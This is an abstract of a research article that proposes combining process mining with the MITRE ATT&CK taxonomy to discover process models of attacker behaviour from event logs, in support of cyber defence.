Discovering attacker profiles using process mining and the MITRE ATT&CK taxonomy

Understanding attackers' behavior is crucial to respond to cyberattacks effectively. Process Mining (PM) is a valuable tool that analyzes runtime events from information systems to discover coordinated tasks to achieve an objective. Our previous research explored using PM to profile attackers, specifically in analyzing low-level system processes' event logs to uncover automated attackers' behavior. In this article, we propose a method that combines PM with the malicious actor behavior taxonomies of the MITRE ATT&CK Framework to discover process models of observed attack strategies. These taxonomies raise the level of abstraction for attacker profiling. We demonstrate this method using a real dataset focused on human behavior, which provides valuable guidelines for future work and enables the development of more effective and adaptable security strategies to combat current cyber threats.